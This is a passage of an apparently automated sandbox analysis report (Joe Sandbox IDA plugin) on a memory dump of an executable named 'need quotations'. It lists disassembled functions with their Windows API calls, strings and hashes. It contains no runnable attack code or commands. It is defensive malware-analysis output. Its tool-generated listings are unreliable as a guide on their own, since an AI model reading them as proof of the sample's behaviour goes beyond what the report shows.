play PlayMe wait, xrefs: 00287B76
play PlayMe, xrefs: 00287B87
open , xrefs: 00287AF1

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 54fa0cbea4f0973b3b87fec8df6d4baa6eb098a0a087c870321f3aade2c20c7d
Instruction ID: 39bf30d9477e17518401524588bd3b82d3cbe213df8635e382bccaeae5ad86af
Opcode Fuzzy Hash: 54fa0cbea4f0973b3b87fec8df6d4baa6eb098a0a087c870321f3aade2c20c7d
Instruction Fuzzy Hash: 411104A467126D79D724F765CC4ADFFFA7CEB92B40F100429B415A20D1DAB04A69CAB0

Function 0028778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00287794

Part of subcall function 0025DC38: timeGetTime.WINMM(?,75C0B400,002B58AB), ref: 0025DC3C

Sleep.KERNEL32(0000000A), ref: 002877C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 002877E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00287806
SetActiveWindow.USER32 ref: 00287825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00287833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00287852
Sleep.KERNEL32(000000FA), ref: 0028785D
IsWindow.USER32 ref: 00287869
EndDialog.USER32(00000000), ref: 0028787A

Strings

BUTTON, xrefs: 002877F8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 8252434e96e66f56051082026dee3e1bcd8bde7cc5a3616c5f7f483e6be783ec
Instruction ID: 20c453fbf1b77f619c1508228a77425e39fa2cc385f6e5432a4089ea6e2833a7
Opcode Fuzzy Hash: 8252434e96e66f56051082026dee3e1bcd8bde7cc5a3616c5f7f483e6be783ec
Instruction Fuzzy Hash: 5E215E78226205AFE7066F20FCADF667F2DFB04349F240075F559821A2CB719C24DB24

Function 002902EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

CoInitialize.OLE32(00000000), ref: 0029034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002903DE
SHGetDesktopFolder.SHELL32(?), ref: 002903F2
CoCreateInstance.OLE32(002CDA8C,00000000,00000001,002F3CF8,?), ref: 0029043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002904AD
CoTaskMemFree.OLE32(?,?), ref: 00290505
_memset.LIBCMT ref: 00290542
SHBrowseForFolderW.SHELL32(?), ref: 0029057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002905A1
CoTaskMemFree.OLE32(00000000), ref: 002905A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002905DF
CoUninitialize.OLE32(00000001,00000000), ref: 002905E1

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: cdc9dd4c795b34cb9d67362dc99efb1aba62f749680537974469d93d40bdea66
Instruction ID: 11b94cf3144957243b1078ee6fbaafd352b9ad8bbd05e94a2a273ccc6d150fd4
Opcode Fuzzy Hash: cdc9dd4c795b34cb9d67362dc99efb1aba62f749680537974469d93d40bdea66
Instruction Fuzzy Hash: 6FB1F975A10209AFDB14DFA4C888DAEBBB9FF48704B1484A9F905EB251DB70EE51CF50

Function 00282E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00282ED6
SetKeyboardState.USER32(?), ref: 00282F41
GetAsyncKeyState.USER32(000000A0), ref: 00282F61
GetKeyState.USER32(000000A0), ref: 00282F78
GetAsyncKeyState.USER32(000000A1), ref: 00282FA7
GetKeyState.USER32(000000A1), ref: 00282FB8
GetAsyncKeyState.USER32(00000011), ref: 00282FE4
GetKeyState.USER32(00000011), ref: 00282FF2
GetAsyncKeyState.USER32(00000012), ref: 0028301B
GetKeyState.USER32(00000012), ref: 00283029
GetAsyncKeyState.USER32(0000005B), ref: 00283052
GetKeyState.USER32(0000005B), ref: 00283060

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 59d792113140f86b7caecb31162a821f4acb7d48399afb04a5c4f0448e43d2e7
Instruction ID: 6577775a4e8990400144ba7557b7d36a9b2b9e74f44e4d356d7b25ee56cd847e
Opcode Fuzzy Hash: 59d792113140f86b7caecb31162a821f4acb7d48399afb04a5c4f0448e43d2e7
Instruction Fuzzy Hash: 0D511738A1678569FB35FFB088007EABFF45F11740F08459EC5C25A5C2DA54AB9CCB62

Function 0027ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0027ED1E
GetWindowRect.USER32(00000000,?), ref: 0027ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0027ED8E
GetDlgItem.USER32(?,00000002), ref: 0027ED99
GetWindowRect.USER32(00000000,?), ref: 0027EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0027EE01
GetDlgItem.USER32(?,000003E9), ref: 0027EE0F
GetWindowRect.USER32(00000000,?), ref: 0027EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0027EE63
GetDlgItem.USER32(?,000003EA), ref: 0027EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0027EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0027EE9B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 3578956911c5c64e493579b07a6e25609e926041bc5b62516aaf5be35f107f53
Instruction ID: 2f9f0f18116218648a9b70bc78d42152350bc2e1c72dd938ab8131070a5da450
Opcode Fuzzy Hash: 3578956911c5c64e493579b07a6e25609e926041bc5b62516aaf5be35f107f53
Instruction Fuzzy Hash: 28510EB1B10205AFDF18CF69DD89EAEBBBAEB88710F158569F519D7290D770AD00CB10

Function 0025B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0025B759,?,00000000,?,?,?,?,0025B72B,00000000,?), ref: 0025BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0025B72B), ref: 0025B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0025B72B,00000000,?,?,0025B2EF,?,?), ref: 0025B88D
DestroyAcceleratorTable.USER32(00000000), ref: 002BD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0025B72B,00000000,?,?,0025B2EF,?,?), ref: 002BD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0025B72B,00000000,?,?,0025B2EF,?,?), ref: 002BD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0025B72B,00000000,?,?,0025B2EF,?,?), ref: 002BD90A
DeleteObject.GDI32(00000000), ref: 002BD91C

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 373bbc026227365c9a1482e0c8daa38236a662df3d41edaab8931dd3591342a2
Instruction ID: e296e7d819160a7fe8c33f2486d3338131aa67c8db6a4af1e1f6abb568d295de
Opcode Fuzzy Hash: 373bbc026227365c9a1482e0c8daa38236a662df3d41edaab8931dd3591342a2
Instruction Fuzzy Hash: D9619E31522A06DFDB279F18DC98BA5B7B9FF94313F14052EE84647960C771A8A8CF48

Function 0025B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0025B526: GetWindowLongW.USER32(?,000000EB), ref: 0025B537

GetSysColor.USER32(0000000F), ref: 0025B438

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f8f17f7c713c7c81b5bfd5f3182780c34f0c2455a91245fb5e2556893e105961
Instruction ID: f39c32661c533f9d3e1e733b033fcb789f6fafba29c176f4aa40fe0eb7a3610a
Opcode Fuzzy Hash: f8f17f7c713c7c81b5bfd5f3182780c34f0c2455a91245fb5e2556893e105961
Instruction Fuzzy Hash: 9241DF30010145AFDF326F28EC99FB93B66AB06732F588265FD698E1E2D7708C55CB25

Function 0028690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00286923
_wcscpy.LIBCMT ref: 00286934
__wsplitpath.LIBCMT ref: 00286958
__wsplitpath.LIBCMT ref: 00286979
_wcscpy.LIBCMT ref: 0028699B
_wcscpy.LIBCMT ref: 002869B9
_wcscpy.LIBCMT ref: 002869C7
_wcscat.LIBCMT ref: 002869D6
_wcscat.LIBCMT ref: 00286A2B
_wcscat.LIBCMT ref: 00286A61
_wcscat.LIBCMT ref: 00286A73

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 2bdc84c05f62c790662c2e53cb3b3d7485617ea55b8419f6a6b8efadb9dd8c07
Instruction ID: cc194b018d1ec87671dea6847505ed066cc4f774baa8158d8c7ce122238d6f46
Opcode Fuzzy Hash: 2bdc84c05f62c790662c2e53cb3b3d7485617ea55b8419f6a6b8efadb9dd8c07
Instruction Fuzzy Hash: BF410E7A85611CAECF65EB94CC85DDB73BCEB44300F0041E6B659A2091EA70ABF58F50

Function 0028D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(002DDC00,002DDC00,002DDC00), ref: 0028D7CE
GetDriveTypeW.KERNEL32(?,002F3A70,00000061), ref: 0028D898
_wcscpy.LIBCMT ref: 0028D8C2

Strings

removable, xrefs: 0028D800
unknown, xrefs: 0028D859
cdrom, xrefs: 0028D7EA
network, xrefs: 0028D82C
ramdisk, xrefs: 0028D842
all, xrefs: 0028D7D4
fixed, xrefs: 0028D816

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 23c7b167cce9932b98b70168e660329625e0dea880e92a80bc3776621efe39bd
Instruction ID: 8336e2c2c408356f97cc98fe4dfcff6351fef4e5e6e99d322392c562c9c5e6b4
Opcode Fuzzy Hash: 23c7b167cce9932b98b70168e660329625e0dea880e92a80bc3776621efe39bd
Instruction Fuzzy Hash: 1F51A0351252059FC704FF14D881A6AB7A5EF84714F20882EF99A572E2DB71DE2DCF42

Function 0024936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 002493AB
__itow.LIBCMT ref: 002493DF

Part of subcall function 00261557: _xtow@16.LIBCMT ref: 00261578

Strings

True, xrefs: 002B4C8C
False, xrefs: 002B4C93
%.15g, xrefs: 002493A5
0x%p, xrefs: 002B4CAD

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: d69ab8927e7d9b3a6ab4c750caf1ca05ff8767c88c2dee883e5d15e195439ee6
Instruction ID: ea115b4ee988274c4626d62277670dba472c134fe8368ac037297f0268031372
Opcode Fuzzy Hash: d69ab8927e7d9b3a6ab4c750caf1ca05ff8767c88c2dee883e5d15e195439ee6
Instruction Fuzzy Hash: 6241EB315312059BDB28EF74D981EBAB7E4EF45340F2444ABE549D7182EA71D9B1CF10

Function 002AA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002AA259
CreateCompatibleDC.GDI32(00000000), ref: 002AA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002AA273
SelectObject.GDI32(00000000,00000000), ref: 002AA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 002AA286
DeleteDC.GDI32(00000000), ref: 002AA28F
GetWindowLongW.USER32(?,000000EC), ref: 002AA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002AA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002AA2B9

Strings

static, xrefs: 002AA1F1

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 9ad6bc6262c7ab13816f65b4aadc7db2d80b25d22b1d22ec30be920c658e04c3
Instruction ID: b1f8c10ccb05ca7a878603fece5555952696f1cbf56450858e164039abad740d
Opcode Fuzzy Hash: 9ad6bc6262c7ab13816f65b4aadc7db2d80b25d22b1d22ec30be920c658e04c3
Instruction Fuzzy Hash: 8B317031111115BFDF215FA4EC49FEA3B6DFF0A360F110228FA19A61A0CB76D821DBA5

Function 00286F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00286F1D
gethostname.WSOCK32(?,00000100), ref: 00286F37
gethostbyname.WSOCK32(?), ref: 00286F44
_wcscpy.LIBCMT ref: 00286F6C
inet_ntoa.WSOCK32(?), ref: 00286F8A
_strcat.LIBCMT ref: 00286F98
_wcscpy.LIBCMT ref: 00286FAF
WSACleanup.WSOCK32 ref: 00286FBD
_wcscpy.LIBCMT ref: 00286FCB

Strings

0.0.0.0, xrefs: 00286F66

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 4a9a119fad6ee0f06a6149f6f22a08e2f07af22efd8816a2840dbaa5542ce64e
Instruction ID: 0e26337870127e7583e4da06bb5ca0f606a673733769a405627f263505b6a5fc
Opcode Fuzzy Hash: 4a9a119fad6ee0f06a6149f6f22a08e2f07af22efd8816a2840dbaa5542ce64e
Instruction Fuzzy Hash: 3B110676924115AFDB25BB70AC4EEDAB7ACEF54710F000176F606A60C1EF70DEA58B50

Function 0026500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00265047

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

__gmtime64_s.LIBCMT ref: 002650E0
__gmtime64_s.LIBCMT ref: 00265116
__gmtime64_s.LIBCMT ref: 00265133
__allrem.LIBCMT ref: 00265189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002651A5
__allrem.LIBCMT ref: 002651BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002651DA
__allrem.LIBCMT ref: 002651F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0026520F
__invoke_watson.LIBCMT ref: 00265280

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 593e1946a1dfb17941da57940c6e79ce3d586aca4345ad7daf0bc0b3c92fb9af
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 9F71EB72A20F27ABE7149F78CC51B5A73A8AF05764F14822AF914D7681E770DDA08BD0

Function 00284DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00284DF8
GetMenuItemInfoW.USER32(00301708,000000FF,00000000,00000030), ref: 00284E59
SetMenuItemInfoW.USER32(00301708,00000004,00000000,00000030), ref: 00284E8F
Sleep.KERNEL32(000001F4), ref: 00284EA1
GetMenuItemCount.USER32(?), ref: 00284EE5
GetMenuItemID.USER32(?,00000000), ref: 00284F01
GetMenuItemID.USER32(?,-00000001), ref: 00284F2B
GetMenuItemID.USER32(?,?), ref: 00284F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00284FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00284FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00284FEB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 1e93dd8a97c0953832e555008e63e395981c8231fe637c706822995b3c7191cd
Instruction ID: 1faec0974b07459a5a015576a6ce0b686b5541f98757e3bf4d747b4a88a758a0
Opcode Fuzzy Hash: 1e93dd8a97c0953832e555008e63e395981c8231fe637c706822995b3c7191cd
Instruction Fuzzy Hash: BF61C2B892125AAFDB21FF64DC88EAE7BB8FB15348F14015DF541A3691D770AD24CB20

Function 002A9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002A9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002A9C9B
GetWindowLongW.USER32(?,000000F0), ref: 002A9CBF
_memset.LIBCMT ref: 002A9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002A9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002A9D5A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 3dc1bc830ccf8b7b2c5f7e3e97c4bbe4b449d0251348a532e934a7b05cf497a3
Instruction ID: 5a3439d0f861791b1bcf1cf52f5d83eaef446c551b42fef134a856708f44c23a
Opcode Fuzzy Hash: 3dc1bc830ccf8b7b2c5f7e3e97c4bbe4b449d0251348a532e934a7b05cf497a3
Instruction Fuzzy Hash: 73617A75910208AFDB11DFA8CC81EEEB7B8EF0A714F14419AFA05E7291DB70AD91DB50

Function 002794E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002794FE
SafeArrayAllocData.OLEAUT32(?), ref: 00279549
VariantInit.OLEAUT32(?), ref: 0027955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0027957B
